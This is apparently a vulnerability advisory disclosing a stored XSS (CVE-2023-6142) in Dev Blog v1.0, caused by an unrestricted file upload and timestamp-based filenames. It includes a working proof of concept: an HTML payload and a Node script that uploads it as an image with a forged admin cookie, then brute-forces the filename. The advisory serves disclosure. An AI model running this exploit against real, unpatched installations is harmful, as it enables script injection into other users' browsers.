---
slug: advisories/bunny/
title: Dev Blog v1.0 - Stored XSS
authors: Carlos Bello
writer: cbello
codename: bunny
product: Dev Blog v1.0 - Stored XSS
date: 2023-11-15 12:00 COT
cveid: CVE-2023-6142
severity: 6.4
description: Dev Blog       -       Stored cross site scripting
keywords: Fluid Attacks, Security, Vulnerabilities, Stored XSS, Dev Blog, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Dev Blog v1.0 - Stored cross site scripting"
    code="[Bad Bunny](https://es.wikipedia.org/wiki/Bad_Bunny)"
    product="Dev Blog"
    affected-versions="v1.0"
    fixed-versions=""
    state="Public"
    release="2023-04-10">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Stored cross-site scripting (Stored XSS)"
    rule="[010. Stored cross-site scripting](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-010)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L"
    score="6.4"
    available="Yes"
    id="[CVE-2023-6142](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6142)">
</vulnerability-table>

## Description

Dev blog v1.0 allows to exploit an XSS through an unrestricted file upload,
together with a bad entropy of filenames. With this an attacker can upload
a malicious HTML file, then guess the filename of the uploaded file and
send it to a potential victim.

## Vulnerability

A Stored cross-Site scripting (XSS) vulnerability has been identified in
Dev blog, which allows an attacker to attacker to execute arbitrary
JS code in the browser of any user of the application.

## Exploit

### exploit.html

```html
<script>
    alert(1)
</script>
```

### exploit.js

```js
const FormData = require('form-data');
const axios = require('axios');
const fs = require('fs');

const url = 'http://127.0.0.1:3000/admin/add';

const formData = new FormData();

formData.append('title', 'junk');
formData.append('subtitle', 'junk');
formData.append('image', fs.createReadStream('./exploit.html'), {
  filename: 'exploit.html',
  contentType: 'image/jpeg'
});
formData.append('content', 'junk');

const config = {
  headers: {
    ...formData.getHeaders(),
    'Content-Length': formData.length,
    'Cookie': 'user=admin',
  },
};

initialDate = Date.now()

axios.post(url, formData, config)
  .then((response) => {
    endDate = Date.now()

    const baseUrl = 'http://127.0.0.1:3000/images/';
    const fileExtension = '.html';

    for (let currentTime = initialDate; currentTime <= endDate; currentTime += 1) {
        const badUrl = `${baseUrl}${currentTime}${fileExtension}`;
        fetch(badUrl)
        .then(response => {
          if (response.ok) {
            console.log("The file name is: " + badUrl);
          }
        })
    }
  })
```

## Evidence of exploitation

<iframe src="https://tinyurl.com/mr2vr4j8"
width="835" height="504" frameborder="0" title="XSS-Devblog"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls
loading="lazy"></iframe>

## Our security policy

We have reserved the ID CVE-2023-6142 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Dev Blog v1.0

* Operating System: MacOS

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/Armanidrisi/devblog/>

## Timeline

<time-lapse
  discovered="2023-11-14"
  contacted="2023-11-14"
  replied=""
  confirmed="2023-11-14"
  patched=""
  disclosure="2023-11-15">
</time-lapse>
